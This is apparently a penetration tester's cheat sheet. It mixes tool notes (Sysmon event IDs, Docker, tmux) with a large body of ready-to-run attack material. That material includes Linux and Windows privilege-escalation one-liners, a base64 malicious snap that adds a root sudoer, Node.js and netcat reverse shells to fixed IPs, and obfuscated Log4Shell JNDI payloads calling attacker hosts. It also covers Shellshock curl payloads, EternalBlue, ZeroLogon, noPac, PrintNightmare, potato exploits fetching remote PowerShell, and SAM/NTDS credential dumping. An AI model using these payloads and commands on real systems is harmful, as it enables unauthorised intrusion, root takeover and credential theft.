evil-winrm -u 'Administrator'  -H '370ddcf45959b2293427baa70376e14e' -i 10.10.10.10

# Download
https://remmina.org/how-to-install-remmina/

# Installing
sudo apt install software-properties-common
sudo apt update
sudo apt-add-repository ppa:remmina-ppa-team/remmina-next
sudo apt update
sudo apt install remmina remmina-plugin-rdp remmina-plugin-secret
sudo killall remmina
sudo remmina

# Download
https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon

# Event
Event ID 1: Process creation
Event ID 2: A process changed a file creation time
Event ID 3: Network connection
Event ID 4: Sysmon service state changed
Event ID 5: Process terminated
Event ID 6: Driver loaded
Event ID 7: Image loaded
Event ID 8: CreateRemoteThread
Event ID 9: RawAccessRead
Event ID 10: ProcessAccess
Event ID 11: FileCreate
Event ID 12: RegistryEvent (Object create and delete)
Event ID 13: RegistryEvent (Value Set)
Event ID 14: RegistryEvent (Key and Value Rename)
Event ID 15: FileCreateStreamHash
Event ID 16: ServiceConfigurationChange
Event ID 17: PipeEvent (Pipe Created)
Event ID 18: PipeEvent (Pipe Connected)
Event ID 19: WmiEvent (WmiEventFilter activity detected)
Event ID 20: WmiEvent (WmiEventConsumer activity detected)
Event ID 21: WmiEvent (WmiEventConsumerToFilter activity detected)
Event ID 22: DNSEvent (DNS query)
Event ID 23: FileDelete (File Delete archived)
Event ID 24: ClipboardChange (New content in the clipboard)
Event ID 25: ProcessTampering (Process image change)
Event ID 26: FileDeleteDetected (File Delete logged)
Event ID 255: Error


# References
https://github.com/SwiftOnSecurity/sysmon-config
https://github.com/trustedsec/SysmonCommunityGuide

# Commands
scp -P 2249 file.txt [email protected].:.

# Download MdbTools
sudo apt install mdbtools

# Commands
mdb-tables file.mdb
mdb-tables -T backup.mdb
mdb-sql file.mdb
	* list tables
	* go
	
# Tricks
for i in $(mdb-tables -T backup.mdb | cut -d' ' -f2);do mdb-export -H backup.mdb $i > /tmp/test; sed "s/.*(//g" /tmp/test | sed 's/"//g' | sed "s/).*//g" | tr , '\n' >> word.txt;done

# Install
sudo apt-get install evolution evolution-plugins

# Commands
evolution

# References
https://rc.partners.org/kb/article/2702

# Install
sudo apt-get install -y pst-utils

# Commands
readpst file.pst
cat file.mbox

=> Commands
$ docker images
$ docker image ls
$ docker pull ubuntu
$ docker run -it ubuntu
$ docker run -it <image_id>
$ docker build /path_to_Dockerfile/
$ docker rmi <image id> -f

=> Curl 
$ curl --unix-socket /var/run/docker.sock -H "Content-Type: application/json"
$ curl -s localhost:8080/images/json -H "Content-Type: application/json"

=> Api
$ /images/json
$ /container/json

=> References
$ https://securityboulevard.com/2019/02/abusing-docker-api-socket/
$ https://github.com/flast101/docker-privesc

# Commands
docker-compose up --build --force-recreate -d
docker-compose up --build -d

# References
https://docs.docker.com/compose/install/

#====Example====
FROM node:7-onbuild
LABEL maintainer "[email protected]"
HEALTHCHECK --interval=5s \
			--timeout=5s \
			CMD curl -f http;//127.0.0.1:8000 || exit 1
EXPOSE 8000

#====Example====

#====Example====
node {
	def app
	
	stage('Clone repository'){
		checkout scm
	}
	stage('Build iamge'){
		app = docker.build("username/docker")
	}
	stage('Test image'){
		app.inside {
			sh 'echo "Tests passed"'
		}
	}
	stage('Push image'){
		docker.withRegistry('https://registry.hub.docker.com','docker-hub-credentials'){
			app.push("$(env.BUILD_NUMBER)")
			app.push("latest")
		}
	}
}

====Comparisons====
var_dump(0 == "a"); // 0 == 0 -> true
var_dump("1" == "01"); // 1 == 1 -> true
var_dump("10" == "1e1"); // 10 == 10 -> true
var_dump(100 == "1e2"); // 100 == 100 -> true
var_dump(.0 == "00"); // 0 == 0

====is_numeric()====
is_numeric(" \t\r\n 123") => true
is_numeric(' 87') => true
is_numeric('87 ') => false
is_numeric(' 87 ') => false
is_numeric('0xdeadbeef')

# Returns True
' -.0'
'0.'
' +2.1e5'
' -1.5E+25'
'1.e5'
'9e9'

====preg_replace()====
#Example1
preg_replace('/a/e', 'sYstEm(ls)', 'aaaa');

#Example2
preg_replace('/a/e', '$output = `cat flag.txt`; echo "<pre>$output</pre>";', 'aaaa');

#Example3
preg_replace('/a/e', 'sYstEm("ls")', 'aaaa');

====Command Execution====
#exec()
exec("whoami");

#passthru()
passthru("whoami");

#system()
system("whoami");

#shell_exec()
shell_exec("whoami");

#backticks (use shell_exec)
`whoami`;

#popen()
popen("whoami","r");

#proc_open()
proc_open("whoami");

#pcntl_exec    
pcntl_exec("whoami");

====Read Files====
#readfile()
readfile("/etc/hosts");

#file_get_contents()
file_get_contents("/etc/hosts");

#fopen()/fread()
fread(fopen("/etc/hosts","r"),filesize("/etc/hosts"));

#include_once();
include_once('/etc/hosts');

#include();
include('/etc/hosts');

#require_once()
require_once('/etc/hosts');

#require()
require('/etc/hosts');

====List Files/Directories====
#opendir()

<?php 

$dir = "/etc/";

// Open a known directory, and proceed to read its contents
if (is_dir($dir)) {
    if ($dh = opendir($dir)) {
        while (($file = readdir($dh)) !== true) {
            echo "filename: $file : filetype: " . filetype($dir . $file) . "\n";
        }
        closedir($dh);
    }
}

?>

#scandir()

<?php
$dir    = '/etc';
$files1 = scandir($dir);
$files2 = scandir($dir, 1);

print_r($files1);
print_r($files2);
?>

#Readdir()

<?php

if ($handle = opendir('/etc')) {
    echo "Directory handle: $handle\n";
    echo "Entries:\n";

    /* This is the correct way to loop over the directory. */
    while (false !== ($entry = readdir($handle))) {
        echo "$entry\n";
    }

    /* This is the WRONG way to loop over the directory. */
    while ($entry = readdir($handle)) {
        echo "$entry\n";
    }

    closedir($handle);
}
?>

#Glob()

<?php
foreach (glob("/etc/*.txt") as $filename) {
    echo "$filename size " . filesize($filename) . "\n";
}
?>

#Information Disclosure
phpinfo
posix_mkfifo
posix_getlogin
posix_ttyname
getenv
get_current_user
proc_get_status
get_cfg_var
disk_free_space
disk_total_space
diskfreespace
getcwd
getlastmo
getmygid
getmyinode
getmypid
getmyuid


# References
- https://github.com/w181496/Web-CTF-Cheatsheet
- https://stackoverflow.com/questions/3115559/exploitable-php-functions
- https://wiki.x10sec.org/web/php/php/

=> Start new session
$ tmux new -s newsession

=> Split Pane Vertically
$ Ctrl + b + "

=> Split Pane Horizontally
$ Ctrl + b + %

=> List session
$ tmux ls

=> Attach to last session
$ tmux a

=> Attach to specific session
$ tmux a -t newsession

=> Toogle Pane Zoom
$ Ctrl + b + z

=> Create new window
$ Ctrl + b + c

=> Next Windows
$ Ctrl + b + n

=> 

=> References
https://tmuxcheatsheet.com/

=> References
$ https://vim.rtorr.com/

# Commands

# References

# List
http://127.0.0.1
http://127.1
http://0
http://0.0.0.0
http://localhost
http://[::]
http://[0000::1]
http://[0:0:0:0:0:ffff:127.0.0.1]
http://①②⑦.⓪.⓪.⓪
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
http://2130706433/
http://017700000001
http://3232235521/
http://3232235777/
http://0x7f000001/
http://0xc0a80014/
http://{domain}@127.0.0.1
http://127.0.0.1#{domain}
http://{domain}.127.0.0.1
http://127.0.0.1/{domain}
http://127.0.0.1/?d={domain}
https://{domain}@127.0.0.1
https://127.0.0.1#{domain}
https://{domain}.127.0.0.1
https://127.0.0.1/{domain}
https://127.0.0.1/?d={domain}
http://{domain}@localhost
http://localhost#{domain}
http://{domain}.localhost
http://localhost/{domain}
http://localhost/?d={domain}
http://127.0.0.1%00{domain}
http://127.0.0.1?{domain}
http://127.0.0.1///{domain}
https://127.0.0.1%00{domain}
https://127.0.0.1?{domain}
https://127.0.0.1///{domain}

# References
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery

# Commands
-> cmd /c 'call "C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvars64.bat" && cl /LD calc.c '

# Crash
kill -SIGBUS <pid>

# Unpack
apport-unpack /var/crash/<something>.crash /tmp/newdirectory

# View Dump
strings CoreDump

# Enable CoreDump Generation
prctl(PR_SET_DUMPABLE, 1);

# References
-> https://access.redhat.com/solutions/4896

(1) Write Multiple Lines
cat >note.txt <<'EOL'
<WRITE HERE>
<WRITE HERE>
EOL

# SUID
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
python2.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# Capabilities
python -c 'import os; os.setuid(0); os.system("/bin/sh")'
python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'

# SUDO
sudo python3 /pathto/script.py

# Notes (Found)
eval('144+0|__import__("os").system("nc -e /bin/sh 10.10.10.10 443")')

#If No Internet Access
1. git clone  https://github.com/saghul/lxd-alpine-builder.git
2. cd lxd-alpine-builder
3. ./build-alpine
4. Upload file.tar.gz into target machine
5. lxc image import ./apline-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
6. lxc init myimage ignite -c security.privileged=true
7. lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
8. lxc start ignite
9. lxc exec ignite /bin/sh

# SUID
gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.execl("/bin/sh", "sh", "-p")'

# References
https://gtfobins.github.io/gtfobins/gimp/

# SUID
gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit

# SUDO
sudo gdb -nx -ex '!sh' -ex quit

# Capabilities
gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit

# References
https://gtfobins.github.io/gtfobins/gdb/

# Sudo
sudo node -e 'child_process.spawn("/bin/sh", {stdio: [0, 1, 2]})'

# Sudo
- Create one file /tmp/passwd
- echo -e "\nnewuser:c.gVrEYFACZTQ:0:0:root:/root:/bin/bash" > /tmp/passwd
- sudo maidag --url '/etc/passwd' < /tmp/passwd
- su newuser

- If there is a folder with SUID
- And it is a webserver
- Try to upload php reverse shell
- Access it from web

# Sudo
sudo /bin/cat /opt/games/../../../etc/passwd

# Sudo
# Malicious snap to create dirty_sock:dirty_sock

## python3 snapmal.py
import base64

TROJAN_SNAP = ('''
aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD/
/////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJh
ZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5
TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERo
T2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawpl
Y2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFt
ZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZv
ciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5n
L2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZt
b2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAe
rFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUj
rkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAA
AAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2
XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5
RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAA
AFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw'''+ 'A' * 4256 + '==')

blob = base64.b64decode(TROJAN_SNAP)
file = open("sample.snap", "wb")
file.write(blob)
file.close()

# Run
sudo snap install --dangerous --devmode exploit.snap

#another method sudo install
[Sudo snap install]
COMMAND="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.23 443 >/tmp/f"
cd $(mktemp -d)
mkdir -p meta/hooks
printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install
chmod +x meta/hooks/install
fpm -n xxxx -s dir -t snap -a all meta

# Commands
sudo /usr/bin/snap install test.snap --dangerous --devmode

# Sudo
sudo msfconsole -x bash

# Commands

# Group docker

# Save as test.conf in /etc/init/testconf
description "Test node.js server"
author      "root"

script
    exec /usr/local/share/nodebrew/node/v8.9.4/bin/node /tmp/reverse.js
end script

# Nodejs - save as /tmp/reverse.js
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "10.10.14.23", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();

# Commands
sudo /sbin/initctl stop test
sudo /sbin/initctl start test

#===Chown/Chmod===
- Imagine there is a cronjob 
	* chown user1:user2 /opt/*
- touch -- --reference=reference
- touch reference
- chmod 6777 reference
- ln -s /etc/shadow /opt/shadow
- ln -d -s /root /opt/root

## References
- https://materials.rangeforce.com/tutorial/2019/11/08/Linux-PrivEsc-Wildcard/

#===Tar===
- Imagine there is cronjob
	* cd /opt;tar cf /opt/backup.tar *
- touch -- "--checkpoint=1"
- touch -- "--checkpoint-action=exec=sh shell.sh"
- echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 443 >/tmp/f" > shell.sh
- echo "cp /bin/bash /tmp/bash; chmod u+s /tmp/bash" > shell.sh
- chmod 777 ./"--checkpoint=1"
- chmod 777 ./"--checkpoint-action=exec=sh shell.sh"
- chmod 777 shell.sh

#===Parameter===
- Imagine there is wildcard in binary with --help
	* sudo cat * --help
- sudo cat /etc/paswd -help
- Try to look if there is any more parameter that can run so that it will run that before --help
 
## References
- https://materials.rangeforce.com/tutorial/2019/11/08/Linux-PrivEsc-Wildcard/
- https://book.hacktricks.xyz/linux-unix/privilege-escalation/wildcards-spare-tricks

# SUID
vim -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
vim.basic -c ':py import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'
vim.basic -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")

# Change root password
-> openssl passwd password123
-> replace in root row
-> root:c.gVrEYFACZTQ:0:0:root:/root:/bin/bash

$ ===One===
include <stdio.h>
include <sys/types.h>
include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/sh");
}
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
sudo LD_PRELOAD=/tmp/shell.so find

# Commands
sudo csvtool call '/bin/sh;false' /etc/passwd -t --help

# SUID
-> https://gist.github.com/A1vinSmith/78786df7899a840ec43c5ddecb6a4740

# SUID
-> screen -x root/shared
-> 
https://possiblelossofprecision.net/?p=1993

# SUDO
-> sudo screen

# What we will see?
(ALL,!root) /bin/bash
(ALL, !root) /usr/bin/ssh

# Commands
sudo -u#-1 ssh -o ProxyCommand=';sh 0<&2 1>&2' x
sudo -u#-1 /bin/bash

# References
https://www.exploit-db.com/exploits/47502

=> Github
$ https://github.com/dirkjanm/CVE-2020-1472

=> Commands (Exploit)
$ python3 cve-2020-1472-exploit.py BANK 10.10.10.10

=> Commands (Restore Password)
$ Get plain_password_hex 
-> secretsdump.py bank.local/Administrator@BANK -target-ip 10.10.10.10  -hashes aad3b435b51404eeaad3b435b51404ee:32db622ed9c00dd1039d8288b0407460
$ python3 restorepassword.py return.local/printer@printer -target-ip 10.10.11.108 -hexpass <HEXPASS>

=> References
$ https://nv2lt.github.io/windows/CVE-2020-1472-Step-by-Step-Procedure/

=> GitHub
$ https://github.com/Ridter/noPac

=> Commands
$ python3 noPac.py bank.local/user:password -dc-ip 10.0.10.10 -dc-host DC01 --impersonate administrator -dump

=> References
$ https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing

=> Marshalsec
$ git clone https://github.com/mbechler/marshalsec.git
$ cd marshalsec
$ sudo apt install maven
$ mvn clean package -DskipTests

=> Payload
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attackerendpoint.com/}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//attackerendpoint.com/}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://attackerendpoint.com/z}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${${::-j}ndi:rmi://attackerendpoint.com/}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://attackerendpoint.com/}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attackerendpoint.com/}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://attackerendpoint.com/}
${jndi:ldap://ATTACKERCONTROLLEDHOST}
${jndi:rmi://adsasd.asdasd.asdasd}

=> Exploit (1)
$ https://github.com/veracode-research/rogue-jndi
$ java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,<BASE64>}|{base64,-d}|{bash,-i}" --httpPort 8888 --hostname 10.10.10.10
$ java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "nc -e /bin/sh 10.10.10.10 1337" --httpPort 8888 --hostname 10.10.10.10
$ ${jndi:ldap://10.10.10.10/o=tomcat}

=> References
$ https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/
$ https://twitter.com/marcioalm/status/1470361495405875200?s=20
$ https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java
$ https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf
$ https://www.sprocketsecurity.com/blog/how-to-exploit-log4j-vulnerabilities-in-vmware-vcenter

# Payload
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://10.10.10.10/cgi-bin/test.cgi
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExOS4xMjMvNDQzIDA+JjE= | base64 -d | bash'" http://10.10.10.10/cgi-bin/admin.cgi

# Refernces
https://github.com/opsxcq/exploit-CVE-2014-6271

# Affected Version
-> Apache 2.4.49 
-> Apache 2.4.50

# References
-> https://github.com/iilegacyyii/PoC-CVE-2021-41773
-> https://www.exploit-db.com/exploits/50406

# Commands
git clone https://github.com/helviojunior/MS17-010.git
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 -f exe > eternalblue.exe
nc -nlvp 443
python send_and_execute.py 10.10.10.4 /<fullpath>/eternalblue.exe
python checker.py 10.10.10.10

# Change username if needed for authentication

# References
- https://github.com/helviojunior/MS17-010.git
- https://www.hackers-arise.com/post/2018/11/30/network-forensics-part-2-packet-level-analysis-of-the-eternalblue-exploit

# Commands
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f python -v shellcode -a x86 --platform windows
# Replace the b" -> "
nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 10.10.10.4 # Check versio
# Replace the shellcode inside the exploit script
# Ensure the payload total would be 410
# "\x90" * (410 - len(shellcode))

# Run Exploit
# 7 -> Windows XP SP3 English (AlwaysOn NX)
python exploit.py 10.10.10.4 7 445   

# References
- https://www.exploit-db.com/exploits/40279

# Tecnique 1
wget https://github.com/dievus/printspoofer/raw/master/PrintSpoofer.exe
PrintSpoofer.exe -i -c cmd
.\PrintSpoofer.exe -i -c "whoami"
.\PrintSpoofer.exe -i -c "powershell ls"
.\PrintSpoofer.exe -i -c "powershell.exe -e YwBhAHQAIAAvAHUAcwBlAHIAcwAvAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIALwBkAGUAcwBrAHQAbwBwAC8AcgBvAG8AdAAuAHQAeAB0AA=="

# Technique 2
##First
git clone https://github.com/CCob/SweetPotato.git
run .sln and compile as .exe (Make sure off anti-virus first)
SweetPotato.exe -p cmd.exe

##Second
git clone https://github.com/uknowsec/SweetPotato.git
run .sln and compile as .exe (Make sure off anti-virus first)
SweetPotato.exe -a "whoami"

# Technique 3
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\users\public\desktop\nc.exe -e cmd.exe 10.10.10.12 443" -t *
JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c whoami" -t *

# Metasploit

# How to grant this privilege?
powershell -ep bypass
Enable-PSRemoting -Force
Install-Module -Name carbon
Import-Module carbon
Grant-CPrivilege -Identity aniq -Privilege SeBackupPrivilege
Test-CPrivilege -Identity aniq -Privilege SeBackupPrivilege

# Commands (1)
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
cd Temp
download sam
download system
pypykatz registry --sam sam system

# Commands (2)
nano aniq.dsh
-> set context persistent nowriters
-> add volume c: alias aniq
-> create
-> expose %aniq% z:
unix2dos aniq.dsh
cd C:\Temp
upload aniq.dsh
diskshadow /s aniq.dsh
robocopy /b z:\windows\ntds . ntds.dit
reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system
secretsdump.py -ntds ntds.dit -system system local

# References
https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/

# Save it in one file
exploit.c

# Compile
sudo apt-get update
sudo apt-get install mingw-w64
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32

# Run
exploit.exe

# References
- https://www.exploit-db.com/exploits/40564

# Download
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

# Usage
exploit.exe

# References
https://www.exploit-db.com/exploits/41020

# Download 
wget https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe

# Usage (Reverse Shell)
exploit.exe 10.10.14.16 9002

# References

# Download
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe

# Usage
churrasco.exe "whoami"

# References
https://www.exploit-db.com/exploits/6705

# Download
wget https://github.com/initstring/dirty_sock/archive/master.zip

# Usage
unzip
cd dirty_sock
python3 dirty_sockv2.py

# Then
su dirty_sock
	* dirty_sock

- If you found chrootkit run in background then you can try this

# Steps
echo "cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash" > /tmp/update
/tmp/bash -p

# Download
wget https://raw.githubusercontent.com/g0rx/iis6-exploit-2017-CVE-2017-7269/master/iis6%20reverse%20shell -O exploit.py

# Usage
python exploit.py 10.10.10.10 80 10.10.10.20 443

# Payload
msfvenom -p windows/shell_reverse_tcp lhost=tun0 lport=9002 –f  msi > install.msi
msfvenom -p windows/x64/shell_reverse_tcp lhost=tun0 lport=9002 –f  msi > install.msi
msiexec /quiet /qn /i  install.msi

# Download
wget https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c

# Compile
gcc -Wall --std=gnu99 -s poc.c -o ptrace_traceme_root

# Usage
./ptrace_traceme_root

# Download
wget https://raw.githubusercontent.com/ahervias77/vsftpd-2.3.4-exploit/master/vsftpd_234_exploit.py

# Manually
- Use "user:)" as user and use "pass" as pass
└─▶ ftp 10.10.10.131                                                                                                                                                                               
Connected to 10.10.10.131.
220 (vsFTPd 2.3.4)
Name (10.10.10.131:root): user:)
331 Please specify the password.
Password: pass

# Usage
└─▶ python3 vsftpd_234_exploit.py 10.150.150.12 21 whoami
[*] Attempting to trigger backdoor...
[+] Triggered backdoor
[*] Attempting to connect to backdoor...
[+] Connected to backdoor on 10.150.150.12:6200
[+] Response:
root

# References
- https://www.programmersought.com/article/18706301160/

- Generate weak password in http://sha512crypt.pw/

# Example - password
$6$Zwdp3uo2Hg1HUvlc$wYEAwd5o9C5xQ1yX97izpRp/IhH4Dk1BzgprmQmK2P9/GnYTCIxzpF63/jelcdi6FjSIXxbirfn8o2gR1rHZq0

- replace in root hash

# Commands
su root

# Step By Step
1. Get APP_KEY
* APP_KEY=base64:d2PlewM8mV4bhlJZQTqvatC3XWexy+AlMqUwCP6YuKg=
2. Use phpgc (Command)
* ./phpggc Laravel/RCE1 system "id" -b
* ./phpggc Laravel/RCE2 system "id" -b
* ./phpggc Laravel/RCE3 system "id" -b
* ./phpggc Laravel/RCE4 system "id" -b
* ./phpggc Laravel/RCE5 system "id" -b
* ./phpggc Laravel/RCE6 system "id" -b
* ./phpggc Laravel/RCE7 system "id" -b
3. Use the CVE php script
* ./cve-2018-15133.php <base64encoded_APP_KEY> <base64encoded-payload>
4. Put it in cookie (POST)

# Notes
-> Remember on gadgetchains/Laravel/RCE, there is others that you can try

# References
https://github.com/kozmic/laravel-poc-CVE-2018-15133
https://snyk.io/vuln/SNYK-PHP-LARAVELFRAMEWORK-174581

# Save as exploit.pl
https://www.exploit-db.com/exploits/48051

# Usage
perl exploit.pl LPE #local
perl exploit.pl RCE 10.0.0.162 10.0.0.24 example.org

# Payload
~! <command>
~! bash

# Referemces
https://github.com/fail2ban/fail2ban/security/advisories/GHSA-m985-3f3v-cwmm
https://hackmyvm.eu/machines/machine.php?vm=Texte

# Downloads
https://raw.githubusercontent.com/roughiz/lfito_rce/master/lfito_rce.py

# Commands
-> python lfito_rce.py -l "http://10.10.10.10/test.php?page=" --lhost 10.10.10.9 --lport 9001 -i "http://10.10.10.105/info.php" -t 100 -a 1 --payload 2 --verbose true

# References
-> https://rafalharazinski.gitbook.io/security/other-web-vulnerabilities/local-remote-file-inclusion/phpinfo-log-race-condition
=> https://raw.githubusercontent.com/VineshChauhan24/LFI-phpinfo-RCE/master/exploit.py

# Download
https://github.com/exrienz/DirtyCow

# Usage
gcc -pthread dirty.c -o dirty -lcrypt
./dirty password

# Kernel 

# <= 2.6.36-rc8
- https://www.exploit-db.com/exploits/15285

# < 2.6.37 
- https://www.exploit-db.com/exploits/15704 

# < 3.10
- https://www.exploit-db.com/exploits/18411
	* https://github.com/lucyoa/kernel-exploits/tree/master/memodipper

# < 3.19
- https://www.exploit-db.com/exploits/37292

# = 3.2.0.23 (Ubuntu 12.04)
- https://www.exploit-db.com/exploits/33589

# <= 4.4.0-116
- https://www.exploit-db.com/exploits/44298

# < 5.11
- https://github.com/briskets/CVE-2021-3493

# References
-> https://github.com/evait-security/ClickNRoot (Kernel Exploit)

# Vulnerable Versions
- Within versions 3.5.0 and before 4.6.4, 4.5.10 and 4.4.14.

# Downloads
https://github.com/joxeankoret/CVE-2017-7494

# Commands (Metasploit)
use linux/samba/is_known_pipename
set SMB::AlwaysEncrypt false
set SMB::ProtocolVersion 1
set rhosts 10.10.10.10

# Commands Manual


# References
- https://bond-o.medium.com/sambacry-rce-cve-2017-7494-41c3dcc0b7ae

# References
- https://motasem-notes.net/how-to-test-if-your-exchange-server-is-compromised-and-vulnerable/
- https://github.com/microsoft/CSS-Exchange/tree/main/Security
- https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers

# Download
https://github.com/afwu/PrintNightmare

# Check If vulnerable (If Got Values)
rpcdump.py @10.10.120.242 | egrep 'MS-RPRN|MS-PAR'

# Sysmon (Look into)
- Event 11 -> spoolsv.exe Writing
- Event 23 -> Deleting .dll files on C:\Windows\System32\spool\drivers\x64\*

# Disabling Print Spooler Service
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled

# Monitor
- Log entries in Microsoft-Windows-PrintService/Admin

# Enabled
- Microsoft-Windows-PrintService/Operational logging 

# Detection References
https://github.com/LaresLLC/CVE-2021-1675

# Exploit (https://github.com/cube0x0/CVE-2021-1675)
msfvenom -p windows/x64/exec CMD='cmd.exe /k "net localgroup administrators username /add"' EXITFUNC=none RC4PASSWORD=S3cr3tP4sw0rdz123 -f dll -o payload.dll
.\SharpPrintNightmare.exe C:\Users\username\Documents\payload.dll
-> Make sure read the installation first.

# Local
IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.6/payload.ps1')
Invoke-Nightmare -NewUser "username" -NewPassword "password"

# Remote
